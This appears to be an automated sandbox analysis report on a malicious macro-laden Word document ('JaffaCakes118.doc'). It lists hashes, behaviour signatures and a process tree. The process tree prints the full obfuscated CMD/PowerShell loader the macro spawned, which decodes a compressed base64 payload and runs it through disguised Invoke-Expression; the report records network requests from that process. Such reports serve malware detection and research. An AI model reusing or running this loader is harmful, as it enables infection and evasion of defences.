Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:02

General

  • Target

    659f8fec40810f7fa45c49039d5d1e99_JaffaCakes118.doc

  • Size

    69KB

  • MD5

    659f8fec40810f7fa45c49039d5d1e99

  • SHA1

    c0ac332e47fdca2bee3bbd53e41d79ecb2f40f6f

  • SHA256

    63f9a90115978f57afc2afd56992e1a413d3a6b0b79fd1b0ae5036812cebf12e

  • SHA512

    fb9bca5a71856ee1c6ef4c9bd0a492f2a2a450ed166052ec253752008b89953f55efb22b1d7c843e6657a24fc646890278bff03bbc558726c57aff7a512997db

  • SSDEEP

    768:DXirRkVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o94GYterHihX51CLW:j4Rkocn1kp59gxBK85fBt+a9tjTiLI

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\659f8fec40810f7fa45c49039d5d1e99_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2928
      • C:\Windows\SysWOW64\CMD.exe
        CMD c:\wINDOWs\SySteM32\cMd.eXE /c"seT oDB= ( NeW-ObjECT IO.COMPresSioN.DeFLatEStREAm( [Io.MemoRysTreAm] [cONvErt]::fROMbASE64sTRIng( 'NZDLbsIwEEV/JYtIBlHsPmipiCLxLEJCbLpg042dTBI3xnZtJyag/HsTWrYz554Z3VBtWSzBjxX7hsQFB3D4CGwlOEgXhVb7GBXO6RkhBQidgi0zfgaDE3Ui5akujzs9/wey5sJLiivJtcK2JCl1lOSgCM07GfG0fiY1N5Ul++N2YlN3DwqwTFVJAdb0Z29uoXLLHZCnxiWXbCNWhzvtvceQMW4YFzm3tKF/35iFFz96eseYMjnYsTa8M5qKrOlEm8fXZfOO8KcW3A3QHA2jkKcyiAP0Nn1BUbi/LOMQZD1zcNIj9IVG/X6EMJwBRZkyQJNiEC42NuAy6OsZXp1prmFXI14rL4Wi6QcXcGMegl44jHayViWMd530NolY5ymjNqEuKa5t+ws=' ) , [SYstEm.Io.coMpResSioN.cOMPrEsSIONmOde]::deCOMprEsS) ^| % { NeW-ObjECT sYsTEM.iO.StReaMReaDeR( $_ ,[Text.EnCoDINg]::aSCiI )} ^|%{ $_.rEadtOEnD( ) })^|^&((get-VariABlE '*MDR*').nAME[3,11,2]-join'')&& POwErSheLL Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( ^&( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti' )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN' ).Invoke( ( ${z`lAh3g}::( \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          POwErSheLL Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( &( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti' )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN' ).Invoke( ( ${z`lAh3g}::( \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2640

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      c878cc7f3373229a367f2ef94e141b1e

      SHA1

      5b1b0e8f03aa30cda7896f96918858db13421637

      SHA256

      ce2959daca22f098d3c694e4cd4ba28358bbcb98936679f545ea09d503347fe3

      SHA512

      0db50b1d15ad7caeb9e97ed3d35b78260bddf222d125656b260d4080356909dab8769448ba1691fa76f61196c30fd8ef56ba4e67f6025a0992e85dac3e068ee0

    • memory/1948-0-0x000000002F431000-0x000000002F432000-memory.dmp

      Filesize

      4KB

    • memory/1948-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1948-2-0x000000007149D000-0x00000000714A8000-memory.dmp

      Filesize

      44KB

    • memory/1948-6-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/1948-8-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/1948-7-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/1948-17-0x000000007149D000-0x00000000714A8000-memory.dmp

      Filesize

      44KB

    • memory/1948-18-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/1948-33-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1948-34-0x000000007149D000-0x00000000714A8000-memory.dmp

      Filesize

      44KB

    • memory/2640-16-0x0000000002BA0000-0x0000000002BFB000-memory.dmp

      Filesize

      364KB